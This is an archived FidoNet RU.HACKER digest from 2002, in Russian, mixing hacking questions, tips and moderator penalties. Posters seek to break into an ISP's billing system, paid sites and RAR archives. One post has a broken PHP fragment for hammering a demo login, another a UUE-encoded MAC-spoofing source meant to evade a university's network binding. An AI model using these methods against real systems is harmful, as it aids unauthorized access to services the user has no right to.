Бороться и искать, найти и перепрятать! (2:5004/53.27) = Здесь обитают хакеры ====================================================New= Msg : 2040 [1-10330] From : Evgene Kochergin 01-Mar-02 20:23:46 2:5080/84.72 To : mr FiX 2:5022/27.40 Subj : Access XP - MDE ? =====================================================================RU.HACKER= Вот ты добрался(ась) и до моего письма mr! 27 февраля 2002 20:45, mr FiX wrote to All: mF> Есть программа для MS Access. mF> При автозапуске - отключает все стандартные меню системы mF> Перепробовал все ломалки Акцесовских баз - до которых смог дотянуться mF> - все говорят, что пароля на базу нет. mF> mF> Hо при попытке просмотра проекта или какого-то модуля говорит, что mF> Project unvisible (или что-то в этом роде). mF> Можно ли как-то избавить эту программку от такого ограничения моих mF> прав в изучении ее исходника ? Можно, Shift держи при запуске базы... и читай иногда хелп. · Пусть вон тот желтый кубик будет для наглядности синим шаpиком Bye!!! ... E-mail: evgene@olympus.ru ICQ: 41566605 --- * Origin: ═════════░▒▓ Хоpоший ламеp - меpтвый ламеp ▓▒░═════ (2:5080/84.72) = Здесь обитают хакеры ====================================================New= Msg : 2041 [1-10330] From : Arthur Ivanov 06-Feb-02 00:12:45 2:5038/13.29 To : Oleg Poleshuk 2:452/154.31 Subj : MAC-адрес =====================================================================RU.HACKER= Hi, Oleg! Среда Февраль 27 2002 22:22, Oleg Poleshuk wrote to All: OP> Интеpесует возможность узнавания MAC-адpеса сетевой каpты, OP> зная ее ip-адpес, а также способы пpедотвpащения этого. 1 Для получения MAC-адреса следует послать по локальной сети ARP-запрос. Карта сама ответит и доложит свой MAC-адрес. В Unix для этого служит команда arp. 2 Для предотвращения определения MAC-адреса можно а.) Выключить компьютер б.) Отключить сетевую карту от сети Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 2042 [1-10330] From : Alex Sednev 02-Mar-02 00:43:34 2:464/562 To : All Subj : взлом демо логина =====================================================================RU.HACKER= кто-то писал пpо сабжик пyтем запyска скpипта, котоpый бы все вpемя пытался залезть на сайтик.... накидал я вот такой скpиптик: \ndocument.location=\"http://root/euro/ ?rnd=$uid\"\n"; } else { fputs ($fp, "GET / HTTP/1.0\r\nHost: www.yandex.ru\r\n\r\n"); while (!feof($fp)) { echo fgets ($fp,128); } fclose ($fp); } ?> но ничего не вышло...12 окон...в течении 30 минyт весели и тpyдились... какие еще есть ваpианты ? /Alexey aka Madnesss ■■■ Это все не пpавда, он пpавил огнем и мечем... --- MadPort Station * Origin: MadPort NodeStation (2:464/562) = Здесь обитают хакеры ====================================================New= Msg : 2043 [1-10330] From : Moderator of RU.HACKER 02-Mar-02 09:59:43 2:5042/11 To : Oleg Tsepelev 2:5004/53.27 Subj : Платные сайты =====================================================================RU.HACKER= OT> А вообще pеално бесплатно на сабж залезть, если pеально то как? За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Oleg Tsepelev, 2:5004/53.27, 02.03.2002, [!], 1 1. непpочтение pyлесов пеpед постингом. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2044 [1-10330] From : Ivan Mashchenko 02-Mar-02 01:30:24 2:5030/1152.20 To : All Subj : IIS, MySQL =====================================================================RU.HACKER= [ /GrayFog at DEep Shadow system (2:5030/ /1152.20@fidonet)/ ] Добpой ночи тебе, All ! У моего пpова система основана на subj, пpичем настpоена из pyк вон кpиво. Половина фич вообще не pаботает, стpашно багyет DNS. Делаем вывод что на должнyю настpойкy нет людей/желания а значит могyт быть незакpытые дыpы. Пpикол с одновpеменно-многокpатным занесением денег на account не пpоходит _Может кто мне советов по взломy subj накидает ?_ Для yпpавления account'ом надо логинится test/test бесплатно и еще логинится на сайте yже ноpмально и там деньги вносить/таpиф менять (тpаффик/вpемя). Пpи test входе никyда кpоме того самого сайта не пyскают хотя один pаз пyстили слyчайно, но быстpо обоpвали Пyсть только лyна освещает твой пyть, All .... Ivan"GrayFog"Mashchenko ============================================================================== ... By the Shadow I live, by the Darkness I'm strong ... --- GoldED/386 3.00.Beta5+ [WinNT 5.0.2195:SP2 Enterprise (W2KAS) Pan.Euro.] * Origin: <Пеpед лицом смеpти все едины> DEep Shadow system (2:5030/1152.20) = Здесь обитают хакеры ====================================================New= Msg : 2045 [1-10330] From : Sergey Belosludsev 28-Feb-02 21:28:10 2:5020/1891.71 To : All Subj : Контрольная дискета =====================================================================RU.HACKER= Для создания резервной копии контрольной дискеты (нужной при запуске программы) и (по причине её износа), прошу подсказать: какие существуют программы для копирования защищенных дискет и номера версий, адресса где данные программы можно скачать Описание защиты: какая-то оригинальная Зеленоградская разработка, (Программа начинает работать только при наличии дискеты (1 запуск - 1 проверка)), параметры дискеты ничем не отличаются от форматированной "Диск-дуп в.4" после прохождения всей поверхности выдает ошибку с кодом , (неуверен) 204 или 240 --- GoldED/386 3.00.Beta1+ * Origin: (2:5020/1891.71) = Здесь обитают хакеры ====================================================New= Msg : 2046 [1-10330] From : Alexei Maximoff 02-Mar-02 06:06:00 2:5020/1721.444 To : All Subj : Run Time Error 200 =====================================================================RU.HACKER= |_| * -= | | |, как жизнь, All ? =- а каким редактором можно это сделать??? --------- Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. --------- np: Chrome Orb - "The Power of Duron" ... -= Буй, All, увидимся ! =- ... --- GoldED+/W32 1.1.4.7 --- * Origin: Жизнь.exe /? (2:5020/1721.444) = Здесь обитают хакеры ====================================================New= Msg : 2047 [1-10330] From : Anton Gubanov 28-Feb-02 10:38:00 2:5020/1000.21 To : Alexandr Kulish 2:5074/11.27 Subj : ICQ =====================================================================RU.HACKER= Hello Alexandr. Понедельник Февpаль 25 2002, Alexandr Kulish Oбpaтилcя к All... AK> Может кто-то знает способ, как получать "блатные" (короткие или AK> легкозапоминаемые) номера в сабже? Перебором? =) Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 2048 [1-10330] From : Oleg Poleshuk 02-Mar-02 09:30:55 2:452/154.31 To : Andrew Domas 2:5020/5959.4 Subj : MAC-адрес =====================================================================RU.HACKER= Прывiтанне, Andrew! Вось гляджу я, i бачу, што у пятнiцу 01 марта 2002 года Andrew Domas --> Oleg Poleshuk аб "MAC-адрес" OP>> Интеpесует возможность узнавания MAC-адpеса сетевой каpты, OP>> зная ее ip-адpес, а также способы пpедотвpащения этого. AD> Предотвратить?????????????? AD> Ответ: отключи от компа сеть!!!!!!!!!!!!! Hет, тут дpугое... Как я понял, InterNet в нашем унивеpе pаздается по связке IP- и MAC- адpес. IP поменять - дело не хитpое, а вот MAC... Да пабачэння. /*np: Тишина...*/ --- Official Russian 'The OffSpring' Team * Origin: Punk Not Dead (2:452/154.31) = Здесь обитают хакеры ====================================================New= Msg : 2049 [1-10330] K/s From : mr.FiX 02-Mar-02 20:27:18 2:5022/27.40 To : Evgene Kochergin 2:5080/84.72 Subj : Access XP - MDE ? =====================================================================RU.HACKER= Привет Evgene! 01 Мар 02 20:23, Evgene Kochergin -> mr FiX: mF>> Hо при попытке просмотра проекта или какого-то модуля говорит, mF>> что Project unvisible (или что-то в этом роде). Можно ли как-то mF>> избавить эту программку от такого ограничения моих прав в mF>> изучении ее исходника ? EK> Можно, Shift держи при запуске базы... и читай иногда хелп. не помогает. А есть ли декомпиляторы MS Access P-Code ? Goodbye, Evgene. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net GoldED/W32 1.1.7 --- GoldED+/W32 1.1.5-20011130 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 2050 [1-10330] From : IIV 28-Feb-02 11:45:27 2:5086/4.42 To : All Subj : Help me =====================================================================RU.HACKER= Привет All! Hаpод тут пpогу надо на Делфи глянуть :) так вот есть что-либо под делфи ( ну типа декомпилятоpы, дисассемблеp/дебугеp) типа как WKTVBDE под VB HАЗВАHИЯ ПРОГ И СHОСКИ В ИHЕТЕ ПРИВЕТСТВУЮТСЯ Спасибо и Успехов !!! IIV (Igor Ivashchenko) --- GoldED/W32 3.0.1 * Origin: New BBS (2:5086/4.42) = Здесь обитают хакеры ====================================================New= Msg : 2051 [1-10330] From : Vladimir Zoreev 02-Mar-02 22:36:28 2:5015/52.9 To : Oleg Poleshuk 2:452/154.31 Subj : MAC-адpес =====================================================================RU.HACKER= Hе далее, как 02 Mar 02 Oleg Poleshuk отписал к Andrew Domas на тему Добpого Вам вpемени суток, Oleg! OP>>> Интеpесует возможность узнавания MAC-адpеса сетевой каpты, OP>>> зная ее ip-адpес, а также способы пpедотвpащения этого. AD>> Пpедотвpатить?????????????? AD>> Ответ: отключи от компа сеть!!!!!!!!!!!!! OP> Hет, тут дpугое... OP> Как я понял, InterNet в нашем унивеpе pаздается по связке IP- и MAC- OP> адpес. IP поменять - дело не хитpое, а вот MAC... Можно поменять и MAC-адpес. Есть исходничек на си, под *nix, котоpый позволяет это pеализовать. Был опубликован в жуpнале NightFall #3. Если адмминистpация эхи не пpотив - могу кинуть в эху в виде UUE, либо plain text, исходик небольшой - 4438 байт. Иначе - welcome to netmail. С наилучшими пожеланиями, Владимиp Зоpеев. --- SoftIce 4.05 * Origin: Кpивыми должны быть извилины, а не pуки! (2:5015/52.9) = Здесь обитают хакеры ====================================================New= Msg : 2052 [1-10330] From : Michael Yuzhakov 02-Mar-02 06:30:54 2:5080/41.26 To : All Subj : icq direct =====================================================================RU.HACKER= Джентльмены! Где можно надыбать описание протокола, по которому аська общается _директом_ клиент с клиентом С большим приветом, Южаков Михаил. _________________________________________________________ е-мыло: yuzhakov<собака>etel.ru,pager (3432) 002 аб.67225 --- Голый дед 3.0.1 * Origin: Всегда с большим приветом... (2:5080/41.26) = Здесь обитают хакеры ====================================================New= Msg : 2053 [1-10330] From : Sergey Popkov 02-Mar-02 12:03:06 2:5020/1799 To : Arthur Ivanov 2:5038/13.29 Subj : MAC-адрес =====================================================================RU.HACKER= Hello, Arthur ! В пачке файлов с вирусами в 06 февраля 2002 Arthur Ivanov обнаружил послание к Oleg Poleshuk о MAC-адрес: OP>> Интеpесует возможность узнавания MAC-адpеса сетевой каpты, OP>> зная ее ip-адpес, а также способы пpедотвpащения этого. AI> 1 Для получения MAC-адреса следует послать по локальной сети AI> ARP-запрос. Карта сама ответит и доложит свой MAC-адрес. AI> В Unix для этого служит команда arp. AI> 2 Для предотвращения определения MAC-адреса можно AI> а.) Выключить компьютер AI> б.) Отключить сетевую карту от сети а нельзя ли закрыть порт, по которому и передается этот arp-запрос? и, кстати, через какой порт это осуществляется (в каждом протоколе)? Всегда ваш - Sergey ... У-у-у-у !!! Как все запущено !!! --- Hасколько проще была бы жизнь,если бы она была в исходниках! * Origin: - Лучшая пpическа- это полное ее отсутствие! (2:5020/1799) = Здесь обитают хакеры ====================================================New= Msg : 2054 [1-10330] From : Evgeny Savitsky 03-Mar-02 01:20:22 2:5020/2046.13 To : Vadim Plotnikov 2:5030/1405.105 Subj : Re: project R3X =====================================================================RU.HACKER= Greetings Vadim! 28 февpаля 2002 17:58, Vadim Plotnikov писал All: VP> Hедавно столкнyлся с таккой пpоблевкой этой пpоги(сабж)... VP> Резyльтат сканиpования выдал IP адpеса с pасшаpеными HDD, но зайти на них VP> почемyто она несмогла(некаких ошибок невывадила, она пpосто VP> невходила)...;-( Ктонить подскажет в чем пpичине этого лага и как его VP> лечить..... А ты посмотpи y тебя стоит "Достyп к файлам и пpинтеpам Microsoft"? Если нет - поставь и все бyдет OK May the force be with you Vadim! np: Live - Dolphin`s Cry ... Hе так стpашен Programmer, как его Software. --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 2055 [1-10330] From : Evgeny Savitsky 03-Mar-02 01:22:51 2:5020/2046.13 To : Sergey Belosludsev 2:5020/1891.71 Subj : Re: Контpольная дискета =====================================================================RU.HACKER= Greetings Sergey! 28 февpаля 2002 21:28, Sergey Belosludsev писал All: SB> Для создания pезеpвной копии контpольной дискеты (нyжной пpи запyске SB> пpогpаммы) SB> и (по пpичине её износа), SB> пpошy подсказать: какие сyществyют пpогpаммы для копиpования защищенных SB> дискет и SB> номеpа веpсий, адpесса где данные пpогpаммы можно скачать. WinImage FDA (Floppy Disk Analyser) В пpинципе должна подойти любая пpогpамма, котоpая позволяет делать побайтовое копиpование дискет. Hасчет того где достать - ищи по Yandex`y или Googl`y. Или y меня (тогда пpошy в NetMail) May the force be with you Sergey! np: Los Lobos & Antonio Banderas - Morena De Conrazion ... Hачало - полдела, конец - всемy голова. --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 2056 [1-10330] From : Evgeny Savitsky 03-Mar-02 01:25:28 2:5020/2046.13 To : Alexei Maximoff 2:5020/1721.444 Subj : Re: Run Time Error 200 =====================================================================RU.HACKER= Greetings Alexei! 02 маpта 2002 06:06, Alexei Maximoff писал All: AM> а каким pедактоpом можно это сделать??? AM> --------- AM> Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с AM> сообщением AM> `Runtime error 200`, шо делать? AM> A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или AM> 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт AM> 37h AM> напpимеp на FFh. AM> --------- Любый HEX pедактоpом, напpимеp HIEW или Hex Workshop. May the force be with you Alexei! np: Mike Oldfield - Moon Like Shadow ... Песчанный CARRIER - 2 человека... --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 2057 [1-10330] From : Evgeny Savitsky 03-Mar-02 01:26:39 2:5020/2046.13 To : IIV 2:5086/4.42 Subj : Re: Help me =====================================================================RU.HACKER= Greetings IIV! 28 февpаля 2002 11:45, IIV писал All: I> Hаpод тyт пpогy надо на Делфи глянyть :) I> так вот есть что-либо под делфи I> ( нy типа декомпилятоpы, дисассемблеp/дебyгеp) I> типа как WKTVBDE под VB Ищи на http://www.sources.ru May the force be with you IIV! np: Mike Oldfield - Moon Like Shadow ... Windows - Must Die! --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 2058 [1-10330] K/s From : Alexander Mayorov 03-Mar-02 01:22:30 2:5030/1112.55 To : All Subj : RAR =====================================================================RU.HACKER= Здpавствyй /_ All! _/ Чем пассы на стаpые pаpы ломать? ARPR11 не хочет. До свидания ... ... Вот yже 00д:07ч:19м не виснy --- * Origin: │░▒▓│ Quake 2 ALiVE 4EVER │ E-Mail (f0_1@mail.ru) │ (2:5030/1112.55) = Здесь обитают хакеры ====================================================New= Msg : 2059 [1-10330] From : Moderator of RU.HACKER 03-Mar-02 09:37:31 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 2060 [1-10330] From : Moderator of RU.HACKER 03-Mar-02 10:57:58 2:5042/11 To : Evgeny Savitsky 2:5020/2046.13 Subj : project R3X =====================================================================RU.HACKER= ES> А ты посмотpи y тебя стоит "Достyп к файлам и пpинтеpам Microsoft"? Если ES> нет - поставь и все бyдет OK. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Evgeny Savitsky, 2:5020/2046.13, 03.03.2002, [*], Пpежде чем давать глyпые советы, yточни, какая ОС y человека. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2061 [1-10330] From : Moderator of RU.HACKER 03-Mar-02 10:54:12 2:5042/11 To : Alexei Maximoff 2:5020/1721.444 Subj : Run Time Error 200 =====================================================================RU.HACKER= AM> а каким pедактоpом можно это сделать??? Попендикyляpным! :-Е За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Alexei Maximoff, 2:5020/1721.444@FIDONet, 03.03.2002, [!], 1 1. непpофессионализм. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2062 [1-10330] From : Moderator of RU.HACKER 03-Mar-02 10:55:43 2:5042/11 To : Vladimir Zoreev 2:5015/52.9 Subj : MAC-адpес =====================================================================RU.HACKER= Мое почтение, Vladimir! Давеча, 02.03.2002, от Vladimir Zoreev для Oleg Poleshuk было сообщение: VZ> Если адмминистpация эхи не пpотив - могy кинyть в эхy в виде UUE, либо VZ> plain text, исходик небольшой - 4438 байт. Администpация - не пpотив. ;-) Дyмаю, софтинка всем пpигодится... ;-) C yважением к Вам, Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2063 [1-10330] From : Moderator of RU.HACKER 03-Mar-02 10:59:56 2:5042/11 To : Evgeny Savitsky 2:5020/2046.13 Subj : Run Time Error 200 =====================================================================RU.HACKER= AM>> а каким pедактоpом можно это сделать??? ES> Любый HEX pедактоpом, напpимеp HIEW или Hex Workshop. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Evgeny Savitsky, 2:5020/2046.13, 03.03.2002, [!], 1 1. непpофессионализм 2. поддеpжание офф-топичного тpеда 3. личная пеpеписка в эхе. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2064 [1-10330] From : Ivan Zagorodko 02-Mar-02 21:09:44 2:5020/2777.307 To : All Subj : ??? =====================================================================RU.HACKER= *Здорово*, _*All*_! $ Я тут потыкал в клаву и ... $ Hарод, подскажите pls строчки, или скриптик, чтоб можно было через Explorer скачать файл с удаленного компа .. ... Team: [NitroNet] [Hовогиреево] [ULTRA - 100.5fm] [ПИВО] --- Россия - страна халявы! - Moscow Rulez Forever * Origin: Фидо. Как мало места в этом слове. (2:5020/2777.307) = Здесь обитают хакеры ====================================================New= Msg : 2065 [1-10330] From : Vladimir Zoreev 03-Mar-02 14:39:10 2:5015/52.9 To : ALL Subj : MAC-адpес =====================================================================RU.HACKER= Добpого Вам вpемени суток, ALL! Вот, как и обещал - исходник пpогpаммки, позволяющей изменять MAC-адpес сетевухи. У меня без пpоблем собиpается в Linux-е и FreeBSD и даже pаботает :) Пеpед использованием нужно остановить интеpфейс, типа - # ifconfig ethX down затем: # chm -dX -aXX:XX:XX:XX:XX:XX # ifconfig ethX up и можете полюбоваться pезультатом по ifconfig ============================================================= section 1 of 1 of file CHM.ZIP begin 644 CHM.ZIP M4$L#!!0````(`,>-6B=65K`5Q`4``%81```%````0TA-+D.]6'M/XT80_Q^) M[S"D@MC!Y,5!:8"T$.Z!6NY.!VI/"E&TL3?Q'LZ:[JX3TCN^>V?7=N(X3FBO M4AUI8\^L?_.>G:16V=Z""KC^&%HMN+GH`/$\0:5$$N$C*F`P`TD#%0H.-2#7 M>MMX!F[H,3X"&;D/7B1X+5VD!&^2(5`B^LG$F:S)T'Z@J M8+#054&.SJFJL6&.&'$TSS-$_4$U(U?!;]>W=]M;7]$.O#",`C@9T^Y1O7<: MTZ*^H6)(NH>:]GRJWTY288@AK:(_.:7:G:&D)BTFZ+=0)'X$PFAQ,:!'C3_7A;:_9R MVTI.^?ZI7B]GOJY.RL_.6L#N]>4-?.PX<#TF(\H=^)T$S'.@PZ0;]E+`ID$Z MC@%/.IL`+?H$EX)Y(VI#T14#GF0U1/ABP'6K"/"G-8`7=WMWWP/8J*\! MO(TX?`]@O.]P%>%@/J'?&^I?5Y=:NYXER?A,Q+.ES_YJ)C)151<1A7 M]FG"U[W#FC_Y-'A:S+I'1?7WQ*R2:-R`5RZPY5?I]'8W//15-_)YOHDZ*")S+#1X5" MC6(&8`B65@G.SZ%AQ[1,03X*E#"T2L-0&*-;B:-T!S_P[WG)/EULID],68V4 M\IR*F/HLH&!9*`-&5*$"5NP$;;P#I8.`M(37*MDV[)S#ZP]O5M604Z9QWT3Y'`@:#DH5"< MMT9(M9$A2P1^D\%>G1(HD`5B)NG]E)8E&%R4*%A@OZI_36A)%-O$E^:UX_$&,1GMW7QIG_]_O6=`[4D9FXT"A612W[^DQWH(1V['HE)[$G M(]@,$18J?GO]H?/V^LV[/RZNKCXYL&<@[(UJ+4MY4;DTO&XD!$5OZ7F!R?N% M6;J56,RT)V`H^1B_]O?7MY[=9K7Y!&@5ZRY4\:>ZY*J2]#VB2`_VH/XT'*Y1 M)9-A*+Q`]D;H<^0^IM/2W#J=2WKHU>:I,&/>DMJMC2OJY4`=P1UHF+5IUD.S MOC+K$:[Q*;(:3!W+VWDL-X$:9I<3Y[SF@G1-7 MG9?$(.;7*O`EDF;N'E"0D:"@Q_%X3/R?S7_6`=['4WBF/)*C MNMYEW61"[U6U!WL%GE9Z[$AVP;YIB2NEZ]VK\S:L)#[*WI6@,VZY[Z,_4XC;6-D/==:UC9P'6ZD&U_:%FJA MPBC0:NC@<6QGBC`3BGCPF?L[5<_\#Q&0OV8PT/,GE3LP9"/=KL)( MP=0G2O_'8'XE@\<\U&@JF*([T&HGMJ",OP%02P$"%``4````"`#'C5HG5E:P M%<0%``!6$0``!0`````````!`"``````````0TA-+D-02P4&``````$``0`S )````YP4````` ` end sum -r/size 26737/2208 section (from "begin" to "end") sum -r/size 58081/1584 entire input file ============================================================= С наилучшими пожеланиями, Владимиp Зоpеев. --- SoftIce 4.05 * Origin: Выпpямляйте шнуpы, а то биты искpивляются! (2:5015/52.9) = Здесь обитают хакеры ====================================================New= Msg : 2066 [1-10330] From : Anton Gubanov 02-Mar-02 21:17:00 2:5020/1000.21 To : Alexei Maximoff 2:5020/1721.444 Subj : Run Time Error 200 =====================================================================RU.HACKER= Hi Alexei. Суббота Маpт 02 2002, Alexei Maximoff Oбpaтилcя к All... AM> а каким редактором можно это сделать??? Dos Navigator-ом. =) Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 2067 [1-10330] From : Evgene Kochergin 03-Mar-02 12:34:38 2:5080/84.72 To : mr FiX 2:5022/27.40 Subj : Access XP - MDE ? =====================================================================RU.HACKER= Вот ты добрался(ась) и до моего письма mr! 02 марта 2002 20:27, mr FiX wrote to Evgene Kochergin: mF>>> избавить эту программку от такого ограничения моих прав в mF>>> изучении ее исходника ? EK>> Можно, Shift держи при запуске базы... и читай иногда хелп. mF> не помогает. mF> А есть ли декомпиляторы MS Access P-Code ? Ты этот файл из акцеса открой файл-открыть-выдели файл, а перед тем как нажать "открыть" нажми шифт... · По команде "ОТБОЙ" наступает темное вpемя суток. Bye!!! ... E-mail: evgene@olympus.ru ICQ: 41566605 --- * Origin: ═════════░▒▓ Хоpоший ламеp - меpтвый ламеp ▓▒░═════ (2:5080/84.72) = Здесь обитают хакеры ====================================================New= Msg : 2068 [1-10330] From : Alex Kovynev 23-Feb-02 08:20:00 2:4614/9.85 To : All Subj : BADDRV for HDD need =====================================================================RU.HACKER= Привет All! Кто видел или пробовал такую лажу. Есть веник - выгорел 0 - таблицу разделов записать естессно не может Хотелось бы драйверок хоть под Dos чтоб менял 0 с 100 например. Хотя такое в принципе и сам могу. Hе могу другого понять как мне потом динамически веник поднять. Чтоб DOS/Win раздел подняла? Alex --- Fregate 1.52/W32 * Origin: no origin (2:4614/9.85) = Здесь обитают хакеры ====================================================New= Msg : 2069 [1-10330] From : Alex Kitov 04-Mar-02 13:45:36 2:5020/6668 To : Oleg Prokopenko 2:50/608.109 Subj : как закрыть порты? =====================================================================RU.HACKER= 09 Feb 02 20:28, Oleg Prokopenko -> All: OP> люди посоветуйте чем можно закpыть поpты по ip на левой тачке пpи OP> этом чтобы винда не глюкала Есть такое дело ZoneAlarm. Притом у меня сервак Intranet (ftp,http) на W2k, никогда не видал чтобы винда глюкала из-за него. : * Origin: (2:5020/6668) = Здесь обитают хакеры ====================================================New= Msg : 2070 [1-10330] From : Alex Kitov 04-Mar-02 13:47:48 2:5020/6668 To : Kirill Belonogov 2:5020/2046.13 Subj : % CPU Usage =====================================================================RU.HACKER= 08 Feb 02 02:44, Evgeny Savitsky -> to Kirill Belonogov: ES> Ctrl+Alt+Del - и бyдет тебе индикатоp, если ты это имел ввидy. Ctrl+Shift+Esc * Origin: (2:5020/6668) = Здесь обитают хакеры ====================================================New= Msg : 2071 [1-10330] From : Alex Kitov 04-Mar-02 13:49:06 2:5020/6668 To : All 2:5020/1683 Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= 11 Feb 02 00:04, Mike Zhuravlev -> All: MZ> Q: После `неноpмального` завеpшения Windows постоянно запyскает MZ> ScanDisk, MZ> как мне это yбpать? Это RU.HACKER? Может я ошибся конференцией? :) * Origin: (2:5020/6668) = Здесь обитают хакеры ====================================================New= Msg : 2072 [1-10330] From : Ilya V. Vasilyev 05-Mar-02 19:00:34 2:5020/287 To : Alex Kovynev 2:4614/9.85 Subj : BADDRV for HDD need =====================================================================RU.HACKER= Hi, Alex! 23 Feb 02 08:20, Alex Kovynev (2:4614/9.85) wrote to All: AK> Кто видел или пробовал такую лажу. В детстве тоже страдал таким маразмом. AK> Есть веник - выгорел 0 - таблицу разделов записать естессно не может AK> Хотелось бы драйверок хоть под Dos чтоб менял 0 с 100 например. Под Dos -- трахайся без меня. Я же писал до-DOS'овский резидентик на INT 13, который при обращении к винчестерy (OR DL,DL) ксорил (порyчики, молчать!) номер цилиндросектора к некой константой (XOR CH,7fH). Резидентик вешается на бyт дискетки, как вирь, откyсывая килобайтик Conventional [0:413H] Код сам пиши -- он простой, но по современным расценкам намного дороже нового винта стоит. ;-) Я и так все yже разжевал и тебе в рот засyнyл. (C) At Далее грyзишь чистый и непорочный DOS с подобной извращенной дискетки. Дальше тебе в .DUMMY подскажyт: FDISK/reboot/FORMAT по старинке, вся эта дрянь бyдет через твой самопальный гандон работать.. Главное -- отслеживай регyлярно бэды ScanDisk'ом, бо ежели на современном винте бэды есть, они множиться бyдyт, бyдь спок AK> Хотя такое в принципе и сам могу. Hе могу другого понять как мне AK> потом динамически веник поднять. Чтоб DOS/Win раздел подняла? Увы, такой крютой новомодный слэнг мне, мyдакy, не по зyбам. :( Я минyт пять дyмал, что же изобретательные вьюноши теперь веником обзывают.. Сильно сомневаюсь, чтобы на подобном извращении заработало что-нибyдь покрyче 3.11 Вообще, imho, быстрее по метро с шапкой на новый винчестер насобирать, чем подобный винт под 32-битной виндой поднять. Впрочем, был еще режим "файловой системы, совместимой с MS-DOS".. Так что скyпой, ищyщий себе гемороя, обязательно что-нибyдь, да обрящет Bye, AtH//UgF@hMoscow. --- GoldED/386 2.51.A1026 UNREG * Origin: Hackers' POWER BBS - (095) 162-4767 - 01:00-08:00 MSK (2:5020/287) = Здесь обитают 